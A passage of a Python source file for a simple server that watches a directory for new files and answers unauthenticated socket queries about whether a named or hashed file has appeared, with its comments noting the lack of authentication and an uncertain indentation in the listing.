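            filename = cmd["filename"]
            ext = cmd["ext"]
            filehash = cmd["filehash"]
            # json.loads yields unicode for strings on Python 2; anything
            # else would break the substring test below.
            if not isinstance(filename, type(u"")):
                raise TypeError("filename must be a string")
            if Debug:
                print("[!] Parsed - filename : {}".format(filename))
                print("[!] Parsed - ext : {}".format(ext))
                print("[!] Parsed - filehash : {}".format(filehash))
        except (TypeError, KeyError):
            # Also reached when recv() returned None. If the peer has gone
            # away the reply fails and the thread ends instead of spinning.
            ret_msg["msg"] = "Wrong Command..."
            ret_msg["type"] = "Error"
            if not _reply(connObj, ret_msg):
                return
            continue

        matched = None
        with EVENT_LIST_LOCK:
            for i in EVENT_LIST:
                ListedFile = i[0].split('/')[-1]
                if Debug:
                    print("[~] Comparing.. {} - {}".format(filename, ListedFile))
                # Name match: substring when no ext is given, otherwise the
                # exact "<filename>.<ext>".
                if filename in ListedFile and (
                        not ext or "{}.{}".format(filename, ext) == ListedFile):
                    matched = i
                    break
                # NOTE(review): indentation was lost in this listing; the hash
                # comparison is taken to sit at loop level, as a fallback for
                # entries whose name does not match — confirm against the
                # repository.
                if Debug:
                    print("[~] Comparing.. {} - {}".format(i[1], filehash))
                if i[1] == filehash:
                    matched = i
                    break
            if matched is not None:
                ret_msg["msg"] = "Exactly Matched"
                ret_msg["type"] = "Exist"
                ret_msg["path"] = matched[0]
                ret_msg["hash"] = filehash
                # Each recorded event is reported at most once.
                EVENT_LIST.remove(matched)
            if Debug:
                if len(ret_msg.keys()) != 0:
                    print("[~] Result : {} - {}".format(filename, ret_msg["msg"]))
                else:
                    print("[~] Result : {} - Fail".format(filename))

        if len(ret_msg.keys()) == 0:
            ret_msg["msg"] = "Fail to find file"
            ret_msg["type"] = "Fail"
        elif not os.path.isfile(ret_msg["path"]):
            # The file was removed again after the event was recorded.
            ret_msg = {}
            ret_msg["msg"] = "Fail to find file"
            ret_msg["type"] = "Fail"
        print(ret_msg)
        if not _reply(connObj, ret_msg):
            return


if __name__ == '__main__':
    # 1. run monitor thread
    print("Start Event Monitor Thread")
    t = threading.Thread(target=eventMonitor, args=(MONITOR_PATH,))
    t.daemon = True
    t.start()

    # 2. connect with client
    # The listener binds to every interface and the protocol has no
    # authentication; limit who can reach MONITOR_PORT (host firewall or a
    # dedicated test network).
    while True:
        print("Connection with client")
        connObj = EventCommunicator('0.0.0.0', MONITOR_PORT)
        connObj.connWait()
        tc = threading.Thread(target=connectionThread, args=(connObj,))
        tc.start()
        # Clients are served one at a time.
        tc.join()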